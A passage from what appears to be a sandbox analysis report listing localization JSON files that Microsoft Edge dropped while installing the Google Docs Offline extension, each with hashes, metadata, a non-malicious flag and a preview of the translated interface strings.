                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):878
                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2766
                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):978
                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):907
                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):914
                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):937
                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1337
                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2846
                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):934
                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):963
                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1320
                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):884
                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):980
                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1941
                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                            Encrypted:false
